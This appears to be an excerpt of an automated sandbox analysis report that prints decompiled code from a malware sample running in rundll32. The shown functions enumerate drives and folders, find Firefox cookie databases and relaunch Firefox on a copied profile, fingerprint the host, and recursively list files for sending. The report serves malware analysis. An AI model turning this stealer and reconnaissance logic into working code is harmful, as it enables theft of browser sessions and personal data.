                                                             Instruction addresses listed alongside the decompiled statements above, in listing order (the address column was detached from the code by extraction): 0x046348f0 0x046348f9 0x04634900 0x0463490d 0x04634919 0x04634927 0x0463492a 0x04634938 0x0463493e 0x04634941 0x04634946 0x0463494e 0x04634956 0x04634960 0x0463496e 0x04634973 0x0463498d 0x046349aa 0x046349c4 0x046349de 0x046349e4 0x046349ea 0x04634a40 0x04634a4a 0x04634a0c 0x04634a25 0x04634a31 0x04634a35 0x04634a3b 0x04634a58 0x04634a68 0x04634a72 0x04634a7c 0x04634a80 0x04634a8e 0x04634a93 0x04634aaa 0x04634aaf 0x04634ab5 0x04634ac2 0x04634ac5 0x04634960 0x04634acf 0x04634ad5 0x04634adb 0x04634aeb 0x04634b0d 0x04634b1c 0x04634b32 0x04634b35 0x04634b59 0x04634b6d 0x04634b70 0x04634b7b 0x04634b7f 0x04634b82 0x04634b93 0x04634bb2 0x04634b95 0x04634b98 0x04634b9e 0x04634bae 0x04634bae 0x04634bc5 0x04634bdb 0x04634bdd 0x04634bdd 0x04634be7 0x04634bee 0x04634bf0 0x04634bf5 0x04634bfd 0x04634c11

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00000800), ref: 04634913
                                                            • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 0463492A
                                                            • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000208), ref: 0463498D
                                                            • SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000410), ref: 046349AA
                                                            • lstrlenW.KERNEL32(?), ref: 046349B7
                                                            • lstrlenW.KERNEL32(?), ref: 046349D1
                                                            • GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,00000000), ref: 04634A02
                                                            • GetDriveTypeW.KERNEL32(00000000), ref: 04634A5C
                                                            • lstrlenW.KERNEL32(00000000), ref: 04634AB9
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 04634AEB
                                                            • lstrlenW.KERNEL32(?), ref: 04634AF4
                                                            • lstrlenW.KERNEL32(?), ref: 04634B1C
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000), ref: 04634B35
                                                            • lstrlenW.KERNEL32(?), ref: 04634B44
                                                            • lstrlenW.KERNEL32(?), ref: 04634B68
                                                            • LocalSize.KERNEL32(00000000), ref: 04634B82
                                                            • LocalSize.KERNEL32(00000000), ref: 04634B8B
                                                            • LocalSize.KERNEL32(00000000), ref: 04634B98
                                                            • LocalReAlloc.KERNEL32(00000000,00000000), ref: 04634BA8
                                                            • LocalSize.KERNEL32(00000000), ref: 04634BB9
                                                            • LocalSize.KERNEL32(00000000), ref: 04634BCE
                                                            • LocalFree.KERNEL32(00000000), ref: 04634BDD
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04634BFD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                            • String ID:
                                                            • API String ID: 4186219405-0
                                                            • Opcode ID: e8a923e1e7dcd76c3a09f20ad8019be790ce4c7e12be45a76295f3d7ac2cef18
                                                            • Instruction ID: bb6c7c2e897e9b6a52a94ec09a1169aef7d094a980698d8181c68d0af0ac1dd4
                                                            • Opcode Fuzzy Hash: e8a923e1e7dcd76c3a09f20ad8019be790ce4c7e12be45a76295f3d7ac2cef18
                                                            • Instruction Fuzzy Hash: EC9180729002199BDB20DF54DC88BEEB3BCEB45300F4040A9E54AE7240EF74AE85CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E04636A40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v12;
                                                            				short _v536;
                                                            				short _v1056;
                                                            				short _v1576;
                                                            				short _v2096;
                                                            				struct _WIN32_FIND_DATAW _v2688;
                                                            				char _v2692;
                                                            				intOrPtr _v2696;
                                                            				char _v2712;
                                                            				signed int _t34;
                                                            				int _t60;
                                                            				intOrPtr _t76;
                                                            				void* _t77;
                                                            				void* _t89;
                                                            				void* _t91;
                                                            				signed int _t92;
                                                            				void* _t93;
                                                            				void* _t94;
                                                            
                                                            				_t34 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t34 ^ _t92;
                                                            				_t76 = __ecx;
                                                            				_v2692 = 0x104;
                                                            				_v2696 = __ecx;
                                                            				_t79 =  &_v536;
                                                            				if(E04647240( &_v536,  &_v2692, __eflags) == 0) {
                                                            					__eflags = _v12 ^ _t92;
                                                            					return E04655AFE(_v12 ^ _t92);
                                                            				} else {
                                                            					lstrcatW( &_v536, L"\\AppData\\Roaming\\Mozilla\\Firefox");
                                                            					_t77 = wsprintfW;
                                                            					wsprintfW( &_v1576, L"%s\\%s",  &_v536,  *((intOrPtr*)(_t76 + 0x70)));
                                                            					wsprintfW( &_v2096, L"%s%s",  &_v536, L"\\Profiles\\*.*");
                                                            					_t94 = _t93 + 0x20;
                                                            					_t89 = FindFirstFileW( &_v2096,  &_v2688);
                                                            					if(_t89 != 0xffffffff) {
                                                            						_t91 = lstrcmpW;
                                                            						do {
                                                            							if(lstrcmpW( &(_v2688.cFileName), ".") == 0 || lstrcmpW( &(_v2688.cFileName), L"..") == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								wsprintfW( &_v1056, L"%s\\Profiles\\%s\\cookies.sqlite",  &_v536,  &(_v2688.cFileName));
                                                            								_t94 = _t94 + 0x10;
                                                            								if(PathFileExistsW( &_v1056) != 0) {
                                                            									wsprintfW( &_v1056, L"%s\\Profiles\\%s",  &_v536,  &(_v2688.cFileName));
                                                            									_t94 = _t94 + 0x10;
                                                            									_t79 =  &_v1056;
                                                            									L046473D0(_t77,  &_v1056,  &_v1576, _t89, _t91);
                                                            								} else {
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            							L9:
                                                            							FindClose(_t89);
                                                            							goto L10;
                                                            							L6:
                                                            							_t60 = FindNextFileW(_t89,  &_v2688);
                                                            							_t104 = _t60;
                                                            						} while (_t60 != 0);
                                                            						goto L9;
                                                            					}
                                                            					L10:
                                                            					wsprintfW( &_v536, L"cmd.exe /c start firefox.exe -no-remote -profile \"%s\"",  &_v1576);
                                                            					asm("xorps xmm0, xmm0");
                                                            					asm("movups [ebp-0xa94], xmm0");
                                                            					_push( &_v2712);
                                                            					_push( &_v536);
                                                            					E046472E0(_t77,  *((intOrPtr*)(_v2696 + 0x70)), _t104);
                                                            					return E04655AFE(_v12 ^ _t92, _t79);
                                                            				}
                                                             			}

                                                             Instruction addresses listed alongside the decompiled statements above, in listing order (the address column was detached from the code by extraction): 0x04636a49 0x04636a50 0x04636a54 0x04636a56 0x04636a68 0x04636a6e 0x04636a7b 0x04636bf1 0x04636bfc 0x04636a81 0x04636a8d 0x04636a96 0x04636aaf 0x04636ac9 0x04636acb 0x04636ae2 0x04636ae7 0x04636aed 0x04636af3 0x04636b03 0x00000000 0x04636b17 0x04636b31 0x04636b33 0x04636b45 0x04636b75 0x04636b77 0x04636b80 0x04636b86 0x00000000 0x00000000 0x00000000 0x04636b45 0x04636b8b 0x04636b8c 0x00000000 0x04636b47 0x04636b4f 0x04636b55 0x04636b55 0x00000000 0x04636b59 0x04636b92 0x04636ba5 0x04636bb6 0x04636bb9 0x04636bc3 0x04636bcd 0x04636bcf 0x04636be7 0x04636be7

                                                            APIs
                                                              • Part of subcall function 04647240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                              • Part of subcall function 04647240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                              • Part of subcall function 04647240: CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            • lstrcatW.KERNEL32(?,\AppData\Roaming\Mozilla\Firefox), ref: 04636A8D
                                                            • wsprintfW.USER32 ref: 04636AAF
                                                            • wsprintfW.USER32 ref: 04636AC9
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 04636ADC
                                                            • lstrcmpW.KERNEL32(?,0467D940), ref: 04636AFF
                                                            • lstrcmpW.KERNEL32(?,0467D944), ref: 04636B11
                                                            • wsprintfW.USER32 ref: 04636B31
                                                            • PathFileExistsW.SHLWAPI(?), ref: 04636B3D
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 04636B4F
                                                            • wsprintfW.USER32 ref: 04636B75
                                                            • FindClose.KERNEL32(00000000), ref: 04636B8C
                                                            • wsprintfW.USER32 ref: 04636BA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wsprintf$FileFind$Closelstrcmp$AddressExistsFirstHandleLibraryLoadNextPathProclstrcat
                                                            • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                            • API String ID: 2816992129-409733341
                                                            • Opcode ID: 23c1c22c739171aea8548263ebe74afc14cb75282fffd71463284f3559f2c69f
                                                            • Instruction ID: eaf58458c096cfa1fe3f340509ced70a372c272c91b8f8d5e523689636166bf8
                                                            • Opcode Fuzzy Hash: 23c1c22c739171aea8548263ebe74afc14cb75282fffd71463284f3559f2c69f
                                                            • Instruction Fuzzy Hash: B8414872A4021DA7DB20DB64DC88DEA73BCFF58311F4045E6E509E3101FA35BA958F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 69%
                                                            			E0464B0C0(void* __ebx, int __ecx, union %anon243 __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed int _v40;
                                                            				void _v428;
                                                            				short _v628;
                                                            				void* _v668;
                                                            				struct _MEMORYSTATUSEX _v740;
                                                            				struct _SYSTEM_INFO _v776;
                                                            				char _v788;
                                                            				int _v792;
                                                            				int _v796;
                                                            				intOrPtr _v800;
                                                            				void* _v804;
                                                            				char _v808;
                                                            				signed int _t77;
                                                            				signed int _t79;
                                                            				intOrPtr _t81;
                                                            				signed int _t89;
                                                            				signed int _t93;
                                                            				char* _t95;
                                                            				intOrPtr _t99;
                                                            				signed int _t116;
                                                            				signed int _t117;
                                                            				signed int _t118;
                                                            				signed int _t119;
                                                            				void* _t129;
                                                            				void* _t130;
                                                            				int _t131;
                                                            				signed int _t133;
                                                            				signed int _t141;
                                                            				signed short* _t146;
                                                            				signed short* _t148;
                                                            				signed int _t156;
                                                            				void* _t160;
                                                            				signed int _t162;
                                                            				signed int _t164;
                                                            				signed short* _t165;
                                                            				intOrPtr* _t179;
                                                            				void* _t181;
                                                            				void* _t182;
                                                            				signed int _t184;
                                                            				signed int _t188;
                                                            				signed int _t190;
                                                            				void* _t191;
                                                            				void* _t193;
                                                            
                                                            				_t167 = __edi;
                                                            				_t136 = __ecx;
                                                            				_t190 = (_t188 & 0xfffffff8) - 0x31c;
                                                            				_t77 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t77 ^ _t190;
                                                            				_t79 =  *0x46878d0; // 0x0
                                                            				_v776.dwOemId = __edx;
                                                            				_v792 = __ecx;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t195 = _t79;
                                                            				if(_t79 == 0) {
                                                            					_t131 = L04655B14(__esi, _t195, 0x3c);
                                                            					_t190 = _t190 + 4;
                                                            					_t136 = _t131;
                                                            					_t79 = E046362B0(__ebx, _t131, __edi);
                                                            					 *0x46878d0 = _t79;
                                                            				}
                                                            				_t179 =  *_t79;
                                                            				if(_t179 != 0) {
                                                            					_t81 =  *_t179 + 0x378;
                                                            					_push(_t81);
                                                            					_v776.dwPageSize = _t81;
                                                            					_t133 = L04655B55(_t136, _t179, __eflags);
                                                            					_t190 = _t190 + 4;
                                                            					__eflags = _t133;
                                                            					if(_t133 == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						_t6 = _t133 + 0x350; // 0x350
                                                            						E0465E060(_t6, _t179,  *_t179 + 0x28);
                                                            						_t89 =  *0x46878d0; // 0x0
                                                            						_t191 = _t190 + 0xc;
                                                            						__eflags = _t89;
                                                            						if(__eflags == 0) {
                                                            							_t130 = L04655B14(_t179, __eflags, 0x3c);
                                                            							_t191 = _t191 + 4;
                                                            							_t89 = E046362B0(_t133, _t130, _t167);
                                                            							 *0x46878d0 = _t89;
                                                            						}
                                                            						asm("movups xmm0, [eax+0x4]");
                                                            						asm("movups [ebx+0x8], xmm0");
                                                            						asm("movups xmm0, [eax+0x14]");
                                                            						asm("movups [ebx+0x18], xmm0");
                                                            						 *((char*)(_t133 + 0x28)) =  *((intOrPtr*)(_t89 + 0x24));
                                                            						 *_t133 = 0x99;
                                                            						 *((intOrPtr*)(_t133 + 0x348)) = GetTickCount();
                                                            						 *((intOrPtr*)(_t133 + 0x34c)) = GetCurrentProcessId();
                                                            						_t93 =  *0x46878d0; // 0x0
                                                            						__eflags = _t93;
                                                            						if(__eflags == 0) {
                                                            							_t129 = L04655B14(_t179, __eflags, 0x3c);
                                                            							_t191 = _t191 + 4;
                                                            							_t93 = E046362B0(_t133, _t129, _t167);
                                                            							 *0x46878d0 = _t93;
                                                            						}
                                                            						_t181 =  *(_t93 + 0x28);
                                                            						_t12 = _t133 + 0x2c; // 0x2c
                                                            						_t95 = memcpy(_t12, _t181, 0x48 << 2);
                                                            						_t171 = _t181 + 0x90;
                                                            						gethostname(_t95, 0x100);
                                                            						asm("movups xmm0, [esp+0x90]");
                                                            						_t15 = _t133 + 0x2e8; // 0x2e8
                                                            						_t182 = _t15;
                                                            						asm("movups [ebx+0x158], xmm0");
                                                            						asm("movups xmm0, [esp+0xa8]");
                                                            						asm("movups [ebx+0x168], xmm0");
                                                            						asm("movups xmm0, [esp+0xbc]");
                                                            						asm("movups [ebx+0x178], xmm0");
                                                            						 *((short*)(_t133 + 0x188)) = _v628;
                                                            						E0465DEA0(_t181 + 0x90, _t182, 0, 0x5e);
                                                            						_t99 = _v800;
                                                            						_t19 = _t133 + 0x346; // 0x346
                                                            						_t160 = _t19;
                                                            						_t193 = _t191 + 0x18;
                                                            						_v808 = 0x2f;
                                                            						_t141 =  *(_t99 + 0x5c) & 0x0000ffff;
                                                            						__eflags = _t141 - 1;
                                                            						if(_t141 != 1) {
                                                            							__eflags = _t141 - 2;
                                                            							if(_t141 == 2) {
                                                            								_t156 =  *((intOrPtr*)(_t99 + 0x24)) + 4;
                                                            								__eflags = _t156;
                                                            								goto L13;
                                                            							}
                                                            						} else {
                                                            							_t156 =  *(_t99 + 0x20);
                                                            							L13:
                                                            							 *((intOrPtr*)( *_t156 + 0x34))(_t182,  &_v808, _t160);
                                                            						}
                                                            						GetSystemInfo( &_v776);
                                                            						 *((short*)(_t133 + 0x14c)) = _v776.dwNumberOfProcessors;
                                                            						_v796 = 4;
                                                            						_v792 = 4;
                                                            						RegOpenKeyW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",  &_v804);
                                                            						RegQueryValueExW(_v804, L"~MHz", 0,  &_v792,  &_v788,  &_v796);
                                                            						RegCloseKey(_v804);
                                                            						 *(_t133 + 0x150) = _v788;
                                                            						_v740.dwLength = 0x40;
                                                            						GlobalMemoryStatusEx( &_v740);
                                                            						 *(_t133 + 0x154) = (_v740.ullTotalPhys << 0x00000020 | _v740.dwMemoryLoad) >> 0x14;
                                                            						__imp__CoInitialize(0);
                                                            						 *((intOrPtr*)(_t133 + 0x2e4)) = E04632DB0(_t133, 0, _t171, _t182);
                                                            						__imp__CoUninitialize();
                                                            						 *((intOrPtr*)(_t133 + 0x18c)) = _v792;
                                                            						__eflags = E0464AE80(_t133,  &_v428, _t171, _t182, __eflags);
                                                            						if(__eflags == 0) {
                                                            							_t146 = _a4;
                                                            							_t56 = _t133 + 0x190; // 0x190
                                                            							_t162 = _t56 - _t146;
                                                            							__eflags = _t162;
                                                            							do {
                                                            								_t116 =  *_t146 & 0x0000ffff;
                                                            								_t146 =  &(_t146[1]);
                                                            								 *(_t162 + _t146 - 2) = _t116;
                                                            								__eflags = _t116;
                                                            							} while (__eflags != 0);
                                                            						} else {
                                                            							_t52 = _t133 + 0x190; // 0x190
                                                            							_t182 =  &_v428;
                                                            							memcpy(_t52, _t182, 0x19 << 2);
                                                            							_t193 = _t193 + 0xc;
                                                            							_t171 = _t182 + 0x32;
                                                            						}
                                                            						_t117 = E0464AFA0(_t133,  &_v428, _t171, _t182, __eflags);
                                                            						__eflags = _t117;
                                                            						if(_t117 == 0) {
                                                            							_t148 = _a8;
                                                            							_t65 = _t133 + 0x1f4; // 0x1f4
                                                            							_t164 = _t65 - _t148;
                                                            							__eflags = _t164;
                                                            							do {
                                                            								_t118 =  *_t148 & 0x0000ffff;
                                                            								 *(_t148 + _t164) = _t118;
                                                            								_t148 =  &(_t148[1]);
                                                            								__eflags = _t118;
                                                            							} while (_t118 != 0);
                                                            						} else {
                                                            							_t61 = _t133 + 0x1f4; // 0x1f4
                                                            							memcpy(_t61,  &_v428, 0x32 << 2);
                                                            							_t193 = _t193 + 0xc;
                                                            							_t148 = 0;
                                                            						}
                                                            						_t165 = _a12;
                                                            						_t68 = _t133 + 0x2bc; // 0x2bc
                                                            						_t184 = _t68 - _t165;
                                                            						__eflags = _t184;
                                                            						do {
                                                            							_t119 =  *_t165 & 0x0000ffff;
                                                            							_t69 =  &(_t165[1]); // 0x0
                                                            							_t165 = _t69;
                                                            							 *(_t184 + _t165 - 2) = _t119;
                                                            							__eflags = _t119;
                                                            						} while (_t119 != 0);
                                                            						_push(_t148);
                                                            						_push(0x3f);
                                                            						_push(_v788);
                                                            						 *((intOrPtr*)(_t133 + 4)) = _a16;
                                                            						E04631C60(_v808);
                                                            						L04655B0F(_t133);
                                                            						__eflags = _v40 ^ _t193 + 0x00000004;
                                                            						return E04655AFE(_v40 ^ _t193 + 0x00000004, _t133);
                                                            					}
                                                            				} else {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t190);
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 046362B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0464B6FC,?,04686318,?,?,0464B6FC), ref: 04636360
                                                              • Part of subcall function 046362B0: RegCloseKey.ADVAPI32(0464B6FC,?,04686318,?,?,0464B6FC), ref: 0463636D
                                                            • GetTickCount.KERNEL32 ref: 0464B189
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0464B195
                                                            • gethostname.WS2_32(?,00000100), ref: 0464B1DA
                                                            • GetSystemInfo.KERNEL32(?), ref: 0464B26B
                                                            • RegOpenKeyW.ADVAPI32 ref: 0464B29C
                                                            • RegQueryValueExW.ADVAPI32(00000004,~MHz,00000000,00000004,00000004,?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 0464B2BC
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 0464B2C6
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 0464B2E3
                                                            • CoInitialize.OLE32(00000000), ref: 0464B300
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$CountCurrentGlobalInfoInitializeMemoryProcessQueryStatusSystemTickValuegethostname
                                                            • String ID: /$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                            • API String ID: 963674043-1973391949
                                                            • Opcode ID: 58cd581887cf8d695e3985f365d324baaf5ac22e92a73fc8e530af02ba69aaff
                                                            • Instruction ID: a5abf5d7616afe41f2e4e6487b0d07be3128875affbba163b238fbbee738f06e
                                                            • Opcode Fuzzy Hash: 58cd581887cf8d695e3985f365d324baaf5ac22e92a73fc8e530af02ba69aaff
                                                            • Instruction Fuzzy Hash: BE91ED716043819BDB11DF64C888BAA77E4FF88308F04466DED499B256FB34FA44CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E046342B0(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				signed int _v12;
                                                            				short _v1056;
                                                            				char _v2096;
                                                            				short _v3136;
                                                            				intOrPtr _v3704;
                                                            				struct _WIN32_FIND_DATAW _v3728;
                                                            				signed int _v3732;
                                                            				long _v3736;
                                                            				intOrPtr _v3740;
                                                            				signed int _v3744;
                                                            				void* _v3748;
                                                            				signed int _t80;
                                                            				void* _t88;
                                                            				signed int _t91;
                                                            				signed int _t92;
                                                            				signed int _t99;
                                                            				signed int _t100;
                                                            				void* _t101;
                                                            				signed int _t104;
                                                            				signed int _t128;
                                                            				void* _t133;
                                                            				signed int _t137;
                                                            				signed int _t139;
                                                            				void* _t140;
                                                            				void* _t141;
                                                            				intOrPtr _t142;
                                                            				intOrPtr _t143;
                                                            				intOrPtr _t144;
                                                            				intOrPtr _t145;
                                                            				intOrPtr _t147;
                                                            				void* _t148;
                                                            				void* _t149;
                                                            				void* _t150;
                                                            				long _t152;
                                                            				void* _t153;
                                                            				long _t154;
                                                            				signed int _t155;
                                                            				void* _t156;
                                                            				void* _t157;
                                                            
                                                            				_t80 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t80 ^ _t155;
                                                            				_t147 = _a4;
                                                            				_t152 = 0x2800;
                                                            				_v3744 = __ecx;
                                                            				_v3740 = _t147;
                                                            				_v3732 = _a8;
                                                            				_v3736 = 0x2800;
                                                            				_t133 = LocalAlloc(0x40, 0x2800);
                                                            				wsprintfW( &_v3136, L"%s\\*.*", _t147);
                                                            				_t157 = _t156 + 0xc;
                                                            				_t88 = FindFirstFileW( &_v3136,  &_v3728);
                                                            				_v3748 = _t88;
                                                            				if(_t88 != 0xffffffff) {
                                                            					 *_t133 = 0x74;
                                                            					_t148 = 1;
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_t137 = ".";
                                                            						_t91 =  &(_v3728.cFileName);
                                                            						while(1) {
                                                            							_t140 =  *_t91;
                                                            							if(_t140 !=  *_t137) {
                                                            								break;
                                                            							}
                                                            							if(_t140 == 0) {
                                                            								L7:
                                                            								_t92 = 0;
                                                            							} else {
                                                            								_t145 =  *((intOrPtr*)(_t91 + 2));
                                                            								_t14 = _t137 + 2; // 0x2e0000
                                                            								if(_t145 !=  *_t14) {
                                                            									break;
                                                            								} else {
                                                            									_t91 = _t91 + 4;
                                                            									_t137 = _t137 + 4;
                                                            									if(_t145 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L7;
                                                            									}
                                                            								}
                                                            							}
                                                            							L9:
                                                            							if(_t92 != 0) {
                                                            								_t137 = L"..";
                                                            								_t99 =  &(_v3728.cFileName);
                                                            								while(1) {
                                                            									_t141 =  *_t99;
                                                            									if(_t141 !=  *_t137) {
                                                            										break;
                                                            									}
                                                            									if(_t141 == 0) {
                                                            										L15:
                                                            										_t100 = 0;
                                                            									} else {
                                                            										_t144 =  *((intOrPtr*)(_t99 + 2));
                                                            										_t17 = _t137 + 2; // 0x2e
                                                            										if(_t144 !=  *_t17) {
                                                            											break;
                                                            										} else {
                                                            											_t99 = _t99 + 4;
                                                            											_t137 = _t137 + 4;
                                                            											if(_t144 != 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L15;
                                                            											}
                                                            										}
                                                            									}
                                                            									L17:
                                                            									if(_t100 != 0) {
                                                            										_t101 = 0;
                                                            										do {
                                                            											_t137 =  *(_t155 + _t101 - 0xe60) & 0x0000ffff;
                                                            											_t101 = _t101 + 2;
                                                            											 *(_t155 + _t101 - 0x82e) = _t137;
                                                            										} while (_t137 != 0);
                                                            										if(_a12 != 0) {
                                                            											E0465F1B0( &_v2096);
                                                            											_t157 = _t157 + 4;
                                                            										}
                                                            										if(_a16 != 0 || (_v3728.dwFileAttributes & 0x00000010) == 0) {
                                                            											_t102 =  &_v2096;
                                                            											if(_a20 == 0) {
                                                            												_t139 = _v3732;
                                                            												while(1) {
                                                            													_t142 =  *_t102;
                                                            													if(_t142 !=  *_t139) {
                                                            														break;
                                                            													}
                                                            													if(_t142 == 0) {
                                                            														L31:
                                                            														_t137 = 0;
                                                            													} else {
                                                            														_t143 =  *((intOrPtr*)(_t102 + 2));
                                                            														if(_t143 !=  *((intOrPtr*)(_t139 + 2))) {
                                                            															break;
                                                            														} else {
                                                            															_t102 = _t102 + 4;
                                                            															_t139 = _t139 + 4;
                                                            															if(_t143 != 0) {
                                                            																continue;
                                                            															} else {
                                                            																goto L31;
                                                            															}
                                                            														}
                                                            													}
                                                            													L33:
                                                            													_t104 = 0 | _t137 == 0x00000000;
                                                            													goto L34;
                                                            												}
                                                            												asm("sbb ecx, ecx");
                                                            												_t137 = _t139 | 0x00000001;
                                                            												goto L33;
                                                            											} else {
                                                            												_push(_v3732);
                                                            												_push( &_v2096);
                                                            												_t128 = E0465D73B(_t137);
                                                            												_t157 = _t157 + 8;
                                                            												asm("sbb eax, eax");
                                                            												_t104 =  ~( ~_t128);
                                                            											}
                                                            											L34:
                                                            											if(_t104 != 0) {
                                                            												_t37 = _t152 - 0x410; // 0x23f0
                                                            												if(_t148 > _t37) {
                                                            													_t154 = _t152 + 0x410;
                                                            													_v3736 = _t154;
                                                            													_t133 = LocalReAlloc(_t133, _t154, 0x42);
                                                            												}
                                                            												 *(_t148 + _t133) = _v3728.dwFileAttributes & 0x00000010;
                                                            												_t149 = _t148 + 1;
                                                            												wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                            												_t153 = 2 + lstrlenW( &_v1056) * 2;
                                                            												E0465E060(_t149 + _t133,  &_v1056, _t153);
                                                            												_t150 = _t149 + _t153;
                                                            												_t152 = _v3736;
                                                            												_t157 = _t157 + 0x1c;
                                                            												 *((intOrPtr*)(_t150 + _t133)) = _v3728.nFileSizeHigh;
                                                            												 *((intOrPtr*)(_t150 + _t133 + 4)) = _v3728.nFileSizeLow;
                                                            												 *((intOrPtr*)(_t150 + _t133 + 8)) = _v3728.ftLastWriteTime;
                                                            												 *((intOrPtr*)(_t150 + _t133 + 0xc)) = _v3704;
                                                            												_t148 = _t150 + 0x10;
                                                            											}
                                                            											if((_v3728.dwFileAttributes & 0x00000010) != 0) {
                                                            												goto L39;
                                                            											}
                                                            										} else {
                                                            											L39:
                                                            											E0465DEA0(_t148,  &_v1056, 0, 0x410);
                                                            											wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                            											_t137 = _v3744;
                                                            											_t157 = _t157 + 0x1c;
                                                            											E046342B0(_t133, _t137, _t148, _t152,  &_v1056, _v3732, _a12, _a16, _a20);
                                                            										}
                                                            									}
                                                            									goto L40;
                                                            								}
                                                            								asm("sbb eax, eax");
                                                            								_t100 = _t99 | 0x00000001;
                                                            								goto L17;
                                                            							}
                                                            							goto L40;
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t92 = _t91 | 0x00000001;
                                                            						goto L9;
                                                            						L40:
                                                            					} while (FindNextFileW(_v3748,  &_v3728) != 0);
                                                            					if(_t148 > 1) {
                                                            						_push(_t137);
                                                            						_push(0x3f);
                                                            						_push(_t148);
                                                            						_push(_t133);
                                                            						E04631C60( *((intOrPtr*)(_v3744 + 4)));
                                                            					}
                                                            					LocalFree(_t133);
                                                            					FindClose(_v3748);
                                                            				}
                                                            				return E04655AFE(_v12 ^ _t155);
                                                            			}

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00002800,?,?,?), ref: 046342EC
                                                            • wsprintfW.USER32 ref: 04634301
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 04634318
                                                            • _wcsstr.LIBVCRUNTIME ref: 04634418
                                                            • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04634484
                                                            • wsprintfW.USER32 ref: 046344B1
                                                            • lstrlenW.KERNEL32(?), ref: 046344C1
                                                            • wsprintfW.USER32 ref: 0463454C
                                                            • FindNextFileW.KERNEL32(?,?), ref: 04634583
                                                            • LocalFree.KERNEL32(00000000), ref: 046345AA
                                                            • FindClose.KERNEL32(?), ref: 046345B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
